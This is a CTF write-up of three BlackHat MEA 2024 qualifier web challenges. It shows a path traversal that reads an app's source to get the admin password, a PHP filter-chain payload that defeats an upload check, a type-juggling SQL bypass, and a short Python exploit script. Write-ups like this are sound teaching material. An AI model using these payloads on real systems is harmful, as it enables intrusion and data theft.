BlackHat MEA 2024 Qualifiers β Web Challenge Write-Ups
Weβre thrilled to share that our team made it into the Top 100 for the BlackHat MEA 2024 Qualifiers! Here are detailed walkthroughs for three web challenges we solved: Watermelon, Free Flag, and Notey. Each one tested different aspects of web exploitation, from file traversal to unconventional SQL logic.
Watermelon Write-Up
- Category: Web
- Points: 120
- Difficulty: Easy
Challenge Description
All love for Watermelons πππ
Note: The code is not jailed β take care while crafting exploits.
π Challenge Files
Walkthrough
1. Registration & Login
We registered a user via /register and grabbed the session cookie after login.
2. File Traversal β Admin Password
We discovered that app/app.py contained admin credentials and identified a file traversal vulnerability in the /upload path.
Using curl, we accessed /file/1/../../../app/app.py and extracted the password:
3. Admin Login & Cookie Hijack
We logged in with the credentials and copied the session:
4. Flag Retrieval
A simple GET to /admin with the admin cookie gave us the flag:
Free Flag Write-Up
- Category: Web
- Points: 110
- Difficulty: Easy
Challenge Description
Free Free
π Challenge Files
Exploit Strategy
The application checked for specific content in uploaded files. We used the wrapwarp tool to generate a filtered payload:
python3 wrapwarp.py /flag.txt "<?php" "?>" 100This created a long filter chain, bypassing content restrictions:
php://filter/convert.base64-encode|convert.iconv.855.UTF7|...π Retrieving the Flag
Posting the payload allowed us to bypass file inspection and retrieve the flag from inside a PHP wrapper.
Notey Write-Up
- Category: Web
- Points: 180
- Difficulty: Medium
Challenge Description
I created a note-sharing site. Donβt try to access other peopleβs notes β grass isnβt greener :β(
π Challenge Files
Vulnerability: Type Juggling β Logic Flaw
The app lets users view notes using an ID and secret. But the viewNote endpoint didnβt validate input types, allowing arrays to be passed.
Sending:
/viewNote?note_id=66¬e_secret[username]=adminResulted in this SQL query:
SELECT note_id, username, note FROM notesWHERE note_id = '66' AND secret = `username` = 'admin'Which simplifies to:
... WHERE note_id = '66' AND 1The condition evaluates true because the username='admin' exists.
Alternative Bypass
If username isnβt available, we could still bypass with:
/viewNote?note_id=66¬e_secret[note]=testExploit Script
The session expired quickly (under 3 seconds), so we automated the entire flow:
import requests
base_url = 'http://a7c623f98ed8647acdccc.playat.flagyard.com'username = "hanzala"password = "11223344"
sess = requests.Session()sess.post(f"{base_url}/register", data={"username": username, "password": password})sess.post(f"{base_url}/login", data={"username": username, "password": password})
target_url = f"{base_url}/viewNote?note_id=66¬e_secret[username]=admin"exp = sess.get(target_url)print(f"Flag: {exp.json()[0]['note']}")Final Thoughts
These challenges blended practical web attack techniques with creative logic flaws. It was a rewarding experience to solve them under pressure β and making it into the Top 100 feels even better. Huge shoutout to the organizers and good luck to everyone in the next stage! πͺπ½
Happy Hacking,